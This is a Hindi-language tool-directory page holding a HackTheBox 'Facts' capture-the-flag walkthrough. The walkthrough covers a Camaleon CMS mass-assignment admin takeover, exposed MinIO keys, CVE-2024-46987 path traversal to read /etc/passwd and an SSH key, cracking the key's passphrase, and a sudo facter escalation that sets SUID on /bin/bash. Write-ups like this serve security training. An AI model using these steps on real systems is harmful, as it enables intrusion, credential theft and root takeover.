Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HackTheBox-Facts — HTB Facts एक आसान Linux बॉक्स है जिसमें Camaleon CMS और MinIO शामिल हैं। खुले पंजीकरण और बड़े पैमाने पर असाइनमेंट भेद्यता के माध्यम से व्यवस्थापक पहुंच प्राप्त करें, फिर व्यवस्थापक सेटिंग्स से MinIO क्रेडेंशियल निकालें। SSH निजी कुंजी चुराने के लिए CVE-2024-46987 पथ ट्रैवर्सल का उपयोग करें, उसका पासफ़्रेज़ क्रैक करें, और GTFOBins के माध्यम से facter पर sudo अनुमतियों का दुरुपयोग करके रूट तक बढ़ाएँ। | Kitploit
उपकरण/GitHubGitHub/suriyaboon/hackthebox-facts
विशेषाधिकार वृद्धिटोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

HTB Facts एक आसान Linux बॉक्स है जिसमें Camaleon CMS और MinIO शामिल हैं। खुले पंजीकरण और बड़े पैमाने पर असाइनमेंट भेद्यता के माध्यम से व्यवस्थापक पहुंच प्राप्त करें, फिर व्यवस्थापक सेटिंग्स से MinIO क्रेडेंशियल निकालें। SSH निजी कुंजी चुराने के लिए CVE-2024-46987 पथ ट्रैवर्सल का उपयोग करें, उसका पासफ़्रेज़ क्रैक करें, और GTFOBins के माध्यम से facter पर sudo अनुमतियों का दुरुपयोग करके रूट तक बढ़ाएँ।

लर्निंग और शिक्षा
GitHubsuriyaboon/hackthebox-facts

HackTheBox-Facts

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

HTB तथ्य — पूर्ण राइटअप

कठिनाई: मध्यम
OS: Linux
टैग: Web, MinIO, Camaleon CMS, पथ भ्रमण, SSTI, विशेषाधिकार वृद्धि


विषय-सूची

  1. टोह
  2. वेब एनुमरेशन — पोर्ट 80
  3. MinIO खोज — पोर्ट 54321
  4. Camaleon CMS — व्यवस्थापक पहुँच
  5. व्यवस्थापक भूमिका के लिए विशेषाधिकार वृद्धि
  6. MinIO क्रेडेंशियल्स की खोज
  7. मनमाना फ़ाइल पढ़ना — CVE-2024-46987
  8. SSH पहुँच trivia के रूप में
  9. रूट तक विशेषाधिकार वृद्धि
  10. झंडे

टोह

सभी खुले TCP पोर्ट की पहचान के लिए पूर्ण TCP पोर्ट स्कैन से प्रारंभ करें।

root@kitploit:~
nmap -p- --min-rate 5000 -T4 10.129.244.96

परिणाम:

पोर्टसेवाटिप्पणी
22SSHOpenSSH
80HTTPNginx 1.26.3 (Ubuntu)
54321अज्ञातMinIO के रूप में पहचाना गया

लक्ष्य को /etc/hosts में जोड़ें:

root@kitploit:~
echo "10.129.244.96 facts.htb" >> /etc/hosts

वेब एनुमरेशन — पोर्ट 80

http://facts.htb पर ब्राउज़ करने पर Camaleon CMS (Ruby on Rails) पर बना एक ट्रिविया वेबसाइट दिखाई देती है। मुख्य संकेतक:

  • कुकी नाम: _factsapp_session (Rails सत्र)
  • संपत्ति पथ: /assets/themes/camaleon_first/
  • मेटा टैग में CSRF टोकन
  • सर्वर: nginx/1.26.3 (Ubuntu)

सभी उपलब्ध पृष्ठों के लिए साइटमैप सूचीबद्ध करें:

root@kitploit:~
curl -s http://facts.htb/sitemap.xml

खोजे गए उल्लेखनीय पथ:

  • /admin → /admin/login पर रीडायरेक्ट करता है
  • /rss
  • विभिन्न ट्रिविया पृष्ठ: /animal-ejected, /anne-frank, आदि।

व्यवस्थापक लॉगिन पैनल की जाँच करें:

root@kitploit:~
curl -v http://facts.htb/admin
# → 302 रीडायरेक्ट /admin/login पर

MinIO खोज — पोर्ट 54321

curl के साथ अज्ञात पोर्ट की जाँच करने पर MinIO का पता चलता है, जो एक S3-संगत ऑब्जेक्ट स्टोरेज सेवा है:

root@kitploit:~
curl -v http://facts.htb:54321

प्रतिक्रिया:

root@kitploit:~
<Error>
  <Code>AccessDenied</Code>
  <Message>Access Denied.</Message>
</Error>

हेडर पुष्टि करते हैं: Server: MinIO

संभावित बकेट नामों की सूची बनाएँ (सभी 403 लौटाते हैं, जो उनके अस्तित्व की पुष्टि करता है):

root@kitploit:~
for bucket in facts backup uploads media files images data private secret admin internal; do
  code=$(curl -s -o /dev/null -w "%{http_code}" http://facts.htb:54321/$bucket)
  echo "$bucket: $code"
done

सभी 403 Forbidden लौटाते हैं — बकेट मौजूद हैं लेकिन क्रेडेंशियल्स आवश्यक हैं।


Camaleon CMS — व्यवस्थापक पहुँच

CMS की पहचान

एसेट पथ और सत्र कुकी से, CMS की पहचान Camaleon CMS के रूप में होती है।

ज्ञात कमजोरियों की जाँच करें:

root@kitploit:~
searchsploit camaleon

परिणाम:

root@kitploit:~
Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)   | ruby/webapps/51489.txt

व्यवस्थापक पैनल संस्करण 2.9.0 के रूप में पुष्टि होती है (लॉगिन के बाद फुटर में दिखाई देता है)।

खाता बनाना

http://facts.htb/admin/login पर व्यवस्थापक लॉगिन पृष्ठ में "खाता बनाएँ" लिंक शामिल है। एक नया खाता पंजीकृत करें:

  • http://facts.htb/admin/users/sign_up पर जाएँ
  • कोई भी मान्य क्रेडेंशियल भरें (जैसे test123 / test123)
  • सबमिट करें — यह Client भूमिका वाला खाता बनाता है

पंजीकरण के बाद, व्यवस्थापक डैशबोर्ड में लॉग इन करें। खाते में सीमित Client विशेषाधिकार हैं।


व्यवस्थापक भूमिका के लिए विशेषाधिकार वृद्धि

मास असाइनमेंट भेद्यता

Camaleon CMS पासवर्ड बदलने वाले एंडपॉइंट पर मास असाइनमेंट हमले के लिए संवेदनशील है। पासवर्ड बदलने के अनुरोध को इंटरसेप्ट करके और password[role] पैरामीटर इंजेक्ट करके, एक हमलावर अपनी भूमिका को admin तक बढ़ा सकता है।

Burp Suite का उपयोग करते हुए कदम:

  1. Client खाते के साथ व्यवस्थापक पैनल में लॉग इन करें।
  2. प्रोफ़ाइल → संपादित करें → पासवर्ड बदलें पर जाएँ।
  3. कोई भी नया पासवर्ड दर्ज करें और प्रक्रिया पर क्लिक करें।
  4. Burp Suite में POST अनुरोध को इंटरसेप्ट करें।
  5. अनुरोध बॉडी में &password[role]=admin जोड़ें:
root@kitploit:~
_method=patch&authenticity_token=<TOKEN>&password%5Bpassword%5D=test123&password%5Bpassword_confirmation%5D=test123&password[role]=admin
  1. अनुरोध को आगे भेजें — प्रतिक्रिया 200 OK होनी चाहिए।
  2. अपडेट किए गए क्रेडेंशियल के साथ फिर से लॉग इन करें।

खाते में अब व्यवस्थापक विशेषाधिकार हैं, जो CMS व्यवस्थापक पैनल तक पूर्ण पहुँच प्रदान करते हैं, जिसमें सेटिंग्स, मीडिया और फ़ाइल सिस्टम सेटिंग्स शामिल हैं।


MinIO क्रेडेंशियल्स की खोज

व्यवस्थापक पहुँच के साथ, यहाँ जाएँ:

root@kitploit:~
सेटिंग्स → सामान्य साइट → फ़ाइल सिस्टम सेटिंग्स

पृष्ठ हार्डकोडेड MinIO (AWS S3-संगत) क्रेडेंशियल प्रकट करता है:

root@kitploit:~
AWS S3 पहुँच कुंजी:    AKIA59D605615FFC8875
AWS S3 गुप्त कुंजी:    O8RU3/gJFlfcZAievtTfBaxJbOg5ZOwa0tmIZLWt
AWS S3 बकेट नाम:       randomfacts
AWS S3 क्षेत्र:         us-east-1
AWS S3 एंडपॉइंट:       http://localhost:54321

AWS CLI कॉन्फ़िगर करें और बकेट सूचीबद्ध करें:

root@kitploit:~
export AWS_ACCESS_KEY_ID='AKIA59D605615FFC8875'
export AWS_SECRET_ACCESS_KEY='O8RU3/gJFlfcZAievtTfBaxJbOg5ZOwa0tmIZLWt'
export AWS_DEFAULT_REGION='us-east-1'

aws s3 ls --endpoint-url http://facts.htb:54321

खोजे गए बकेट:

root@kitploit:~
2025-09-11  internal
2025-09-11  randomfacts

internal बकेट में trivia उपयोगकर्ता की होम निर्देशिका शामिल है:

root@kitploit:~
aws s3 ls s3://internal/ --endpoint-url http://facts.htb:54321
aws s3 ls s3://internal/.ssh/ --endpoint-url http://facts.htb:54321

# SSH निजी कुंजी डाउनलोड करें
aws s3 cp s3://internal/.ssh/id_ed25519 ./id_ed25519 --endpoint-url http://facts.htb:54321

मनमाना फ़ाइल पढ़ना — CVE-2024-46987

वैकल्पिक रूप से, SSH निजी कुंजी को CVE-2024-46987 के माध्यम से प्राप्त किया जा सकता है, जो Camaleon CMS में एक प्रमाणित पथ भ्रमण भेद्यता है जो सर्वर फ़ाइलों को मनमाने ढंग से पढ़ने की अनुमति देती है।

सार्वजनिक PoC क्लोन करें:

root@kitploit:~
git clone https://github.com/Goultarde/CVE-2024-46987
cd CVE-2024-46987

संवेदनशील फ़ाइलें पढ़ें:

root@kitploit:~
# चरण 1: सिस्टम उपयोगकर्ताओं की गणना के लिए /etc/passwd पढ़ें
python CVE-2024-46987.py -u http://facts.htb --user test123 -p test123 /etc/passwd

आउटपुट (प्रासंगिक पंक्तियाँ):

root@kitploit:~
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash

दो उपयोगकर्ता पहचाने गए: trivia और william। चूँकि trivia के पास लॉगिन शेल और होम निर्देशिका है, SSH निजी कुंजी की जाँच करें:

root@kitploit:~
# चरण 2: trivia की SSH निजी कुंजी पढ़ें
python CVE-2024-46987.py -u http://facts.htb --user test123 -p test123 /home/trivia/.ssh/id_ed25519

कुंजी आउटपुट को एक फ़ाइल में सहेजें:

root@kitploit:~
chmod 600 id_ed25519

SSH पहुँच trivia के रूप में

SSH कुंजी पासफ़्रेज़ क्रैक करना

SSH निजी कुंजी एक पासफ़्रेज़ से एन्क्रिप्ट की गई है। इसे क्रैक करने के लिए ssh2john और john का उपयोग करें:

root@kitploit:~
ssh2john id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

क्रैक किया गया पासफ़्रेज़: dragonballz

SSH के माध्यम से लॉगिन

root@kitploit:~
ssh -i id_ed25519 [email protected]
# पासफ़्रेज़ दर्ज करें: dragonballz

उपयोगकर्ता झंडा प्राप्त करें:

root@kitploit:~
cat /home/william/user.txt

रूट तक विशेषाधिकार वृद्धि

sudo अनुमतियाँ

trivia उपयोगकर्ता के लिए sudo विशेषाधिकार जाँचें:

root@kitploit:~
sudo -l

आउटपुट:

root@kitploit:~
User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

उपयोगकर्ता बिना पासवर्ड के रूट के रूप में /usr/bin/facter चला सकता है। facter एक Ruby-आधारित सिस्टम सूचना उपकरण है।

GTFOBins — facter

GTFOBins के अनुसार, facter --custom-dir के माध्यम से कस्टम Ruby तथ्य फ़ाइलें लोड कर सकता है, जो आह्वान करने वाले उपयोगकर्ता (इस मामले में रूट) के रूप में निष्पादित होती हैं।

शोषण:

root@kitploit:~
# शोषण निर्देशिका और Ruby पेलोड बनाएँ
mkdir -p /tmp/exploit_facts
cat > /tmp/exploit_facts/evil.rb << 'EOF'
system("chmod +s /bin/bash")
EOF

# कस्टम निर्देशिका के साथ रूट के रूप में facter निष्पादित करें
sudo /usr/bin/facter --custom-dir=/tmp/exploit_facts/ x

# bash पर SUID बिट सेट है यह सत्यापित करें
ls -la /bin/bash
# -rwsr-sr-x 1 root root ...

# रूट शेल लॉन्च करें
/bin/bash -p

रूट झंडा प्राप्त करें

root@kitploit:~
whoami
# root

cat /root/root.txt

झंडे

झंडास्थान
user.txt/home/william/user.txt
root.txt/root/root.txt

हमला श्रृंखला सारांश

root@kitploit:~
Nmap स्कैन
    ↓
पोर्ट 80: Camaleon CMS 2.9.0
    ↓
क्लाइंट खाता पंजीकृत करें → व्यवस्थापक पैनल
    ↓
मास असाइनमेंट: password[role]=admin → व्यवस्थापक भूमिका
    ↓
व्यवस्थापक सेटिंग्स → MinIO क्रेडेंशियल्स उजागर
    ↓
CVE-2024-46987: पथ भ्रमण → /home/trivia/.ssh/id_ed25519 पढ़ें
    ↓
ssh2john + John → पासफ़्रेज़: dragonballz
    ↓
trivia के रूप में SSH लॉगिन
    ↓
sudo facter --custom-dir (GTFOBins) → chmod +s /bin/bash
    ↓
/bin/bash -p → root

CVEs और संदर्भ

CVEविवरण
CVE-2024-46987Camaleon CMS प्रमाणित पथ भ्रमण / मनमाना फ़ाइल पढ़ना
CVE-2023-30145Camaleon CMS v2.7.0 SSTI formats पैरामीटर के माध्यम से (इस बॉक्स में उपयोग नहीं किया गया)
  • GTFOBins — facter
  • CVE-2024-46987 PoC
  • Camaleon CMS GitHub
टूल डाउनलोड करें